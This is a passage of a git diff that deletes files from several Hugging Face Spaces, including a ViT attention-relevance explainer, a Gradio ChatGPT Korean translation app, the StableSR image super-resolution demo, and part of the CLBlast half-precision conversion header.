NpEFtsvcB9voh213Jgifb5VIHZtq4wfBeIRSdF2sI+CEpWGXpuLHN1oOiprwIrq5LpEHhHGxQIiDYSiIk/gYzGadEuyUOq8o2B1k5oULZE+dho02hlKtK0cCWv5QADlyz/QhXPZkiwqzgzCRJDGj/1y02xNbBb4ZFanAXgtm/l7fg==", -} diff --git a/spaces/Hila/RobustViT/ViT/explainer.py b/spaces/Hila/RobustViT/ViT/explainer.py deleted file mode 100644 index 7c5b98aeb13ae63e88aae67d9216fd69d6390145..0000000000000000000000000000000000000000 --- a/spaces/Hila/RobustViT/ViT/explainer.py +++ /dev/null @@ -1,71 +0,0 @@ -import torch -import numpy as np -import cv2 - -# rule 5 from paper -def avg_heads(cam, grad): - cam = cam.reshape(-1, cam.shape[-3], cam.shape[-2], cam.shape[-1]) - grad = grad.reshape(-1, cam.shape[-3], grad.shape[-2], grad.shape[-1]) - cam = grad * cam - cam = cam.clamp(min=0).mean(dim=1) - return cam - -# rule 6 from paper -def apply_self_attention_rules(R_ss, cam_ss): - R_ss_addition = torch.matmul(cam_ss, R_ss) - return R_ss_addition - -def upscale_relevance(relevance): - relevance = relevance.reshape(-1, 1, 14, 14) - relevance = torch.nn.functional.interpolate(relevance, scale_factor=16, mode='bilinear') - - # normalize between 0 and 1 - relevance = relevance.reshape(relevance.shape[0], -1) - min = relevance.min(1, keepdim=True)[0] - max = relevance.max(1, keepdim=True)[0] - relevance = (relevance - min) / (max - min) - - relevance = relevance.reshape(-1, 1, 224, 224) - return relevance - -def generate_relevance(model, input, index=None): - # a batch of samples - batch_size = input.shape[0] - output = model(input, register_hook=True) - if index == None: - index = np.argmax(output.cpu().data.numpy(), axis=-1) - index = torch.tensor(index) - - one_hot = np.zeros((batch_size, output.shape[-1]), dtype=np.float32) - one_hot[torch.arange(batch_size), index.data.cpu().numpy()] = 1 - one_hot = torch.from_numpy(one_hot).requires_grad_(True) - one_hot = torch.sum(one_hot.to(input.device) * output) - model.zero_grad() - - num_tokens = model.blocks[0].attn.get_attention_map().shape[-1] - R = 
torch.eye(num_tokens, num_tokens).cuda() - R = R.unsqueeze(0).expand(batch_size, num_tokens, num_tokens) - for i, blk in enumerate(model.blocks): - grad = torch.autograd.grad(one_hot, [blk.attn.attention_map], retain_graph=True)[0] - cam = blk.attn.get_attention_map() - cam = avg_heads(cam, grad) - R = R + apply_self_attention_rules(R, cam) - relevance = R[:, 0, 1:] - return upscale_relevance(relevance) - -# create heatmap from mask on image -def show_cam_on_image(img, mask): - heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET) - heatmap = np.float32(heatmap) / 255 - cam = heatmap + np.float32(img) - cam = cam / np.max(cam) - return cam - - -def get_image_with_relevance(image, relevance): - image = image.permute(1, 2, 0) - relevance = relevance.permute(1, 2, 0) - image = (image - image.min()) / (image.max() - image.min()) - image = 255 * image - vis = image * relevance - return vis.data.cpu().numpy() \ No newline at end of file diff --git a/spaces/Hina4867/bingo/src/components/toaster.tsx b/spaces/Hina4867/bingo/src/components/toaster.tsx deleted file mode 100644 index 4d2693460b61307a1d4c127fd01df9bee16e59ff..0000000000000000000000000000000000000000 --- a/spaces/Hina4867/bingo/src/components/toaster.tsx +++ /dev/null @@ -1,3 +0,0 @@ -'use client' - -export { Toaster } from 'react-hot-toast' diff --git a/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py b/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py deleted file mode 100644 index 149a8cac02b0be3787a6b89a3419927ef1288bf8..0000000000000000000000000000000000000000 --- a/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py +++ /dev/null @@ -1,76 +0,0 @@ -import gradio as gr -import subprocess -import openai -import time -import re - -def translate(text_input, openapi_key): - openai.api_key = openapi_key - - # 라이선스 문장 제거 - rm_line = text_input.find('-->') - text_list = text_input[rm_line+4:].split('\n') - print(text_list) - - reply = [] - - for i in range(0,len(text_list),10): - content = """What do these sentences about Hugging Face Transformers (a machine learning library) mean in Korean? Please do not translate the word after a 🤗 emoji as it is a product name. Please ignore the video and image and translate only the sentences I provided. Ignore the contents of the iframe tag. - ```md - %s"""%'\n'.join(text_list[i:i+10]) - - chat = openai.ChatCompletion.create( - model = "gpt-3.5-turbo-0301", messages=[ - {"role": "system", - "content": content},]) - - print("질문") - print(content) - print("응답") - print(chat.choices[0].message.content) - - reply.append(chat.choices[0].message.content) - - time.sleep(30) - - return ''.join(reply) - -inputs = [ - gr.inputs.Textbox(lines=2, label="Input Open API Key"), - gr.inputs.File(label="Upload MDX File") -] - -outputs = gr.outputs.Textbox(label="Translation") - -def translate_with_upload(text, file): - - openapi_key = text - - if file is not None: - text_input = "" - with open(file.name, 'r') as f: - text_input += f.read() - text_input += '\n' - print(text_input) - # 텍스트에서 코드 블록을 제거합니다. - text_input = re.sub(r'```.*?```', '', text_input, flags=re.DOTALL) - - text_input = re.sub(r'^\|.*\|$\n?', '', text_input, flags=re.MULTILINE) - - # 텍스트에서 빈 줄을 제거합니다. 
- text_input = re.sub(r'^\n', '', text_input, flags=re.MULTILINE) - text_input = re.sub(r'\n\n+', '\n\n', text_input) - else: - text_input = "" - - return translate(text_input, openapi_key) - -prompt_translate = gr.Interface( - fn=translate_with_upload, - inputs=inputs, - outputs=outputs, - title="ChatGPT Korean Prompt Translation", - description="Translate your text into Korean using the GPT-3 model.", verbose=True -) - -prompt_translate.launch() diff --git a/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py b/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py deleted file mode 100644 index 6d7dd625e09451be671908578f93148f371f53cd..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from .unpaired_audio_text import UnpairedAudioText - - -__all__ = [ - "UnpairedAudioText", -] diff --git a/spaces/Iceclear/StableSR/app.py b/spaces/Iceclear/StableSR/app.py deleted file mode 100644 index 9bd68c4c6603413c41e3187e9de6ea6cd8a8633a..0000000000000000000000000000000000000000 --- a/spaces/Iceclear/StableSR/app.py +++ /dev/null @@ -1,363 +0,0 @@ -""" -This file is used for deploying hugging face demo: -https://huggingface.co/spaces/ -""" - -import sys -sys.path.append('StableSR') -import os -import cv2 -import torch -import torch.nn.functional as F -import gradio as gr -import torchvision -from torchvision.transforms.functional import normalize -from ldm.util import instantiate_from_config -from torch import autocast -import PIL -import numpy as np -from pytorch_lightning import seed_everything -from contextlib import nullcontext -from omegaconf import OmegaConf -from PIL import Image -import copy -from scripts.wavelet_color_fix import wavelet_reconstruction, adaptive_instance_normalization -from scripts.util_image import ImageSpliterTh -from basicsr.utils.download_util import load_file_from_url -from einops import rearrange, repeat - -# os.system("pip freeze") - -pretrain_model_url = { - 'stablesr_512': 'https://huggingface.co/Iceclear/StableSR/resolve/main/stablesr_000117.ckpt', - 'stablesr_768': 'https://huggingface.co/Iceclear/StableSR/resolve/main/stablesr_768v_000139.ckpt', - 'CFW': 'https://huggingface.co/Iceclear/StableSR/resolve/main/vqgan_cfw_00011.ckpt', -} -# download weights -if not os.path.exists('./stablesr_000117.ckpt'): - load_file_from_url(url=pretrain_model_url['stablesr_512'], model_dir='./', progress=True, file_name=None) -if not os.path.exists('./stablesr_768v_000139.ckpt'): - load_file_from_url(url=pretrain_model_url['stablesr_768'], model_dir='./', progress=True, file_name=None) -if not os.path.exists('./vqgan_cfw_00011.ckpt'): - load_file_from_url(url=pretrain_model_url['CFW'], model_dir='./', progress=True, file_name=None) - -# download images -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/Lincoln.png', - '01.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/oldphoto6.png', - '02.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/comic2.png', - '03.png') -torch.hub.download_url_to_file( - 
'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/OST_120.png', - '04.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet65/comic3.png', - '05.png') - -def load_img(path): - image = Image.open(path).convert("RGB") - w, h = image.size - w, h = map(lambda x: x - x % 32, (w, h)) # resize to integer multiple of 32 - image = image.resize((w, h), resample=PIL.Image.LANCZOS) - image = np.array(image).astype(np.float32) / 255.0 - image = image[None].transpose(0, 3, 1, 2) - image = torch.from_numpy(image) - return 2.*image - 1. - -def space_timesteps(num_timesteps, section_counts): - """ - Create a list of timesteps to use from an original diffusion process, - given the number of timesteps we want to take from equally-sized portions - of the original process. - For example, if there's 300 timesteps and the section counts are [10,15,20] - then the first 100 timesteps are strided to be 10 timesteps, the second 100 - are strided to be 15 timesteps, and the final 100 are strided to be 20. - If the stride is a string starting with "ddim", then the fixed striding - from the DDIM paper is used, and only one section is allowed. - :param num_timesteps: the number of diffusion steps in the original - process to divide up. - :param section_counts: either a list of numbers, or a string containing - comma-separated numbers, indicating the step count - per section. As a special case, use "ddimN" where N - is a number of steps to use the striding from the - DDIM paper. - :return: a set of diffusion steps from the original process to use. - """ - if isinstance(section_counts, str): - if section_counts.startswith("ddim"): - desired_count = int(section_counts[len("ddim"):]) - for i in range(1, num_timesteps): - if len(range(0, num_timesteps, i)) == desired_count: - return set(range(0, num_timesteps, i)) - raise ValueError( - f"cannot create exactly {num_timesteps} steps with an integer stride" - ) - section_counts = [int(x) for x in section_counts.split(",")] #[250,] - size_per = num_timesteps // len(section_counts) - extra = num_timesteps % len(section_counts) - start_idx = 0 - all_steps = [] - for i, section_count in enumerate(section_counts): - size = size_per + (1 if i < extra else 0) - if size < section_count: - raise ValueError( - f"cannot divide section of {size} steps into {section_count}" - ) - if section_count <= 1: - frac_stride = 1 - else: - frac_stride = (size - 1) / (section_count - 1) - cur_idx = 0.0 - taken_steps = [] - for _ in range(section_count): - taken_steps.append(start_idx + round(cur_idx)) - cur_idx += frac_stride - all_steps += taken_steps - start_idx += size - return set(all_steps) - -def chunk(it, size): - it = iter(it) - return iter(lambda: tuple(islice(it, size)), ()) - -def load_model_from_config(config, ckpt, verbose=False): - print(f"Loading model from {ckpt}") - pl_sd = torch.load(ckpt, map_location="cpu") - if "global_step" in pl_sd: - print(f"Global Step: {pl_sd['global_step']}") - sd = pl_sd["state_dict"] - model = instantiate_from_config(config.model) - m, u = model.load_state_dict(sd, strict=False) - if len(m) > 0 and verbose: - print("missing keys:") - print(m) - if len(u) > 0 and verbose: - print("unexpected keys:") - print(u) - - model.cuda() - model.eval() - return model - -# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') -device = torch.device("cuda") -vqgan_config = OmegaConf.load("StableSR/configs/autoencoder/autoencoder_kl_64x64x4_resi.yaml") -vq_model = 
load_model_from_config(vqgan_config, './vqgan_cfw_00011.ckpt') -vq_model = vq_model.to(device) - -os.makedirs('output', exist_ok=True) - -def inference(image, upscale, dec_w, seed, model_type, ddpm_steps, colorfix_type): - """Run a single prediction on the model""" - precision_scope = autocast - vq_model.decoder.fusion_w = dec_w - seed_everything(seed) - - if model_type == '512': - config = OmegaConf.load("StableSR/configs/stableSRNew/v2-finetune_text_T_512.yaml") - model = load_model_from_config(config, "./stablesr_000117.ckpt") - min_size = 512 - else: - config = OmegaConf.load("StableSR/configs/stableSRNew/v2-finetune_text_T_768v.yaml") - model = load_model_from_config(config, "./stablesr_768v_000139.ckpt") - min_size = 768 - - model = model.to(device) - model.configs = config - model.register_schedule(given_betas=None, beta_schedule="linear", timesteps=1000, - linear_start=0.00085, linear_end=0.0120, cosine_s=8e-3) - model.num_timesteps = 1000 - - sqrt_alphas_cumprod = copy.deepcopy(model.sqrt_alphas_cumprod) - sqrt_one_minus_alphas_cumprod = copy.deepcopy(model.sqrt_one_minus_alphas_cumprod) - - use_timesteps = set(space_timesteps(1000, [ddpm_steps])) - last_alpha_cumprod = 1.0 - new_betas = [] - timestep_map = [] - for i, alpha_cumprod in enumerate(model.alphas_cumprod): - if i in use_timesteps: - new_betas.append(1 - alpha_cumprod / last_alpha_cumprod) - last_alpha_cumprod = alpha_cumprod - timestep_map.append(i) - new_betas = [beta.data.cpu().numpy() for beta in new_betas] - model.register_schedule(given_betas=np.array(new_betas), timesteps=len(new_betas)) - model.num_timesteps = 1000 - model.ori_timesteps = list(use_timesteps) - model.ori_timesteps.sort() - model = model.to(device) - - try: # global try - with torch.no_grad(): - with precision_scope("cuda"): - with model.ema_scope(): - init_image = load_img(image) - init_image = F.interpolate( - init_image, - size=(int(init_image.size(-2)*upscale), - int(init_image.size(-1)*upscale)), - mode='bicubic', - ) - - if init_image.size(-1) < min_size or init_image.size(-2) < min_size: - ori_size = init_image.size() - rescale = min_size * 1.0 / min(init_image.size(-2), init_image.size(-1)) - new_h = max(int(ori_size[-2]*rescale), min_size) - new_w = max(int(ori_size[-1]*rescale), min_size) - init_template = F.interpolate( - init_image, - size=(new_h, new_w), - mode='bicubic', - ) - else: - init_template = init_image - rescale = 1 - init_template = init_template.clamp(-1, 1) - assert init_template.size(-1) >= min_size - assert init_template.size(-2) >= min_size - - init_template = init_template.type(torch.float16).to(device) - - if init_template.size(-1) <= 1280 or init_template.size(-2) <= 1280: - init_latent_generator, enc_fea_lq = vq_model.encode(init_template) - init_latent = model.get_first_stage_encoding(init_latent_generator) - text_init = ['']*init_template.size(0) - semantic_c = model.cond_stage_model(text_init) - - noise = torch.randn_like(init_latent) - - t = repeat(torch.tensor([999]), '1 -> b', b=init_image.size(0)) - t = t.to(device).long() - x_T = model.q_sample_respace(x_start=init_latent, t=t, sqrt_alphas_cumprod=sqrt_alphas_cumprod, sqrt_one_minus_alphas_cumprod=sqrt_one_minus_alphas_cumprod, noise=noise) - - if init_template.size(-1)<= min_size and init_template.size(-2) <= min_size: - samples, _ = model.sample(cond=semantic_c, struct_cond=init_latent, batch_size=init_template.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True) - else: - samples, _ = 
model.sample_canvas(cond=semantic_c, struct_cond=init_latent, batch_size=init_template.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True, tile_size=int(min_size/8), tile_overlap=min_size//16, batch_size_sample=init_template.size(0)) - x_samples = vq_model.decode(samples * 1. / model.scale_factor, enc_fea_lq) - if colorfix_type == 'adain': - x_samples = adaptive_instance_normalization(x_samples, init_template) - elif colorfix_type == 'wavelet': - x_samples = wavelet_reconstruction(x_samples, init_template) - x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0) - else: - im_spliter = ImageSpliterTh(init_template, 1280, 1000, sf=1) - for im_lq_pch, index_infos in im_spliter: - init_latent = model.get_first_stage_encoding(model.encode_first_stage(im_lq_pch)) # move to latent space - text_init = ['']*init_latent.size(0) - semantic_c = model.cond_stage_model(text_init) - noise = torch.randn_like(init_latent) - # If you would like to start from the intermediate steps, you can add noise to LR to the specific steps. - t = repeat(torch.tensor([999]), '1 -> b', b=init_template.size(0)) - t = t.to(device).long() - x_T = model.q_sample_respace(x_start=init_latent, t=t, sqrt_alphas_cumprod=sqrt_alphas_cumprod, sqrt_one_minus_alphas_cumprod=sqrt_one_minus_alphas_cumprod, noise=noise) - # x_T = noise - samples, _ = model.sample_canvas(cond=semantic_c, struct_cond=init_latent, batch_size=im_lq_pch.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True, tile_size=int(min_size/8), tile_overlap=min_size//16, batch_size_sample=im_lq_pch.size(0)) - _, enc_fea_lq = vq_model.encode(im_lq_pch) - x_samples = vq_model.decode(samples * 1. / model.scale_factor, enc_fea_lq) - if colorfix_type == 'adain': - x_samples = adaptive_instance_normalization(x_samples, im_lq_pch) - elif colorfix_type == 'wavelet': - x_samples = wavelet_reconstruction(x_samples, im_lq_pch) - im_spliter.update(x_samples, index_infos) - x_samples = im_spliter.gather() - x_samples = torch.clamp((x_samples+1.0)/2.0, min=0.0, max=1.0) - - if rescale > 1: - x_samples = F.interpolate( - x_samples, - size=(int(init_image.size(-2)), - int(init_image.size(-1))), - mode='bicubic', - ) - x_samples = x_samples.clamp(0, 1) - x_sample = 255. * rearrange(x_samples[0].cpu().numpy(), 'c h w -> h w c') - restored_img = x_sample.astype(np.uint8) - Image.fromarray(x_sample.astype(np.uint8)).save(f'output/out.png') - - return restored_img, f'output/out.png' - except Exception as error: - print('Global exception', error) - return None, None - - -title = "Exploiting Diffusion Prior for Real-World Image Super-Resolution" -description = r"""
StableSR logo
-Official Gradio demo for Exploiting Diffusion Prior for Real-World Image Super-Resolution.
-🔥 StableSR is a general image super-resolution algorithm for real-world and AIGC images.
-""" -article = r""" -If StableSR is helpful, please help to ⭐ the Github Repo. Thanks! -[![GitHub Stars](https://img.shields.io/github/stars/IceClear/StableSR?style=social)](https://github.com/IceClear/StableSR) - ---- - -📝 **Citation** - -If our work is useful for your research, please consider citing: -```bibtex -@inproceedings{wang2023exploiting, - author = {Wang, Jianyi and Yue, Zongsheng and Zhou, Shangchen and Chan, Kelvin CK and Loy, Chen Change}, - title = {Exploiting Diffusion Prior for Real-World Image Super-Resolution}, - booktitle = {arXiv preprint arXiv:2305.07015}, - year = {2023} -} -``` - -📋 **License** - -This project is licensed under S-Lab License 1.0. -Redistribution and use for non-commercial purposes should follow this license. - -📧 **Contact** - -If you have any questions, please feel free to reach me out at iceclearwjy@gmail.com. - -
- 🤗 Find Me: - Twitter Follow - Github Follow -
- -
visitors
-""" - -demo = gr.Interface( - inference, [ - gr.inputs.Image(type="filepath", label="Input"), - gr.inputs.Number(default=1, label="Rescaling_Factor (Large images require huge time)"), - gr.Slider(0, 1, value=0.5, step=0.01, label='CFW_Fidelity (0 for better quality, 1 for better identity)'), - gr.inputs.Number(default=42, label="Seeds"), - gr.Dropdown( - choices=["512", "768v"], - value="512", - label="Model", - ), - gr.Slider(10, 1000, value=200, step=1, label='Sampling timesteps for DDPM'), - gr.Dropdown( - choices=["none", "adain", "wavelet"], - value="adain", - label="Color_Correction", - ), - ], [ - gr.outputs.Image(type="numpy", label="Output"), - gr.outputs.File(label="Download the output") - ], - title=title, - description=description, - article=article, - examples=[ - ['./01.png', 4, 0.5, 42, "512", 200, "adain"], - ['./02.png', 4, 0.5, 42, "512", 200, "adain"], - ['./03.png', 4, 0.5, 42, "512", 200, "adain"], - ['./04.png', 4, 0.5, 42, "512", 200, "adain"], - ['./05.png', 4, 0.5, 42, "512", 200, "adain"] - ] - ) - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/Illumotion/Koboldcpp/include/clblast_half.h b/spaces/Illumotion/Koboldcpp/include/clblast_half.h deleted file mode 100644 index cbea1723a815cc9ec2045d1b65bec2e8db76193d..0000000000000000000000000000000000000000 --- a/spaces/Illumotion/Koboldcpp/include/clblast_half.h +++ /dev/null @@ -1,249 +0,0 @@ - -// ================================================================================================= -// This file is part of the CLBlast project. The project is licensed under Apache Version 2.0. This -// project loosely follows the Google C++ styleguide and uses a tab-size of two spaces and a max- -// width of 100 characters per line. -// -// Author(s): -// Cedric Nugteren -// -// This file provides simple conversion operations between fp16 (half) and fp32 (float). These -// conversion functions are based on ftp://ftp.fox-toolkit.org/pub/fasthalffloatconversion.pdf and -// are also part of the C++ half-precision header (http://half.sourceforge.net/). -// -// This file is pure C99. -// -// ================================================================================================= - -#ifndef CLBLAST_HALF_H_ -#define CLBLAST_HALF_H_ - -// ================================================================================================= - -// The host data-type for half-precision floating-point (16-bit) is based on the `cl_half` OpenCL -// type, which is a typedef for unsigned short. -typedef unsigned short half; - -// 32-bit union for conversions -typedef union ConversionBits_ { - unsigned int i32; - float f32; -} ConversionBits; - -// ================================================================================================= - -// Converts a IEEE-compliant single-precision value to half-precision floating-point. This function -// applies simple truncation (round toward zero, but with overflows set to infinity) as rounding -// mode. 
-static half FloatToHalf(const float value) { - static const unsigned short base_table[512] = { - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0008, 0x0010, 0x0020, 0x0040, 0x0080, 0x0100, - 0x0200, 0x0400, 0x0800, 0x0C00, 0x1000, 0x1400, 0x1800, 0x1C00, 0x2000, 0x2400, 0x2800, 0x2C00, 0x3000, 0x3400, 0x3800, 0x3C00, - 0x4000, 0x4400, 0x4800, 0x4C00, 0x5000, 0x5400, 0x5800, 0x5C00, 0x6000, 0x6400, 0x6800, 0x6C00, 0x7000, 0x7400, 0x7800, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8001, 0x8002, 0x8004, 0x8008, 0x8010, 0x8020, 0x8040, 0x8080, 0x8100, - 0x8200, 0x8400, 0x8800, 0x8C00, 0x9000, 0x9400, 0x9800, 0x9C00, 0xA000, 0xA400, 0xA800, 0xAC00, 0xB000, 0xB400, 0xB800, 0xBC00, - 0xC000, 0xC400, 0xC800, 0xCC00, 0xD000, 0xD400, 0xD800, 0xDC00, 0xE000, 0xE400, 0xE800, 0xEC00, 0xF000, 0xF400, 0xF800, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 
0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00 - }; - static const unsigned char shift_table[512] = { - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, - 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 13, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, - 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 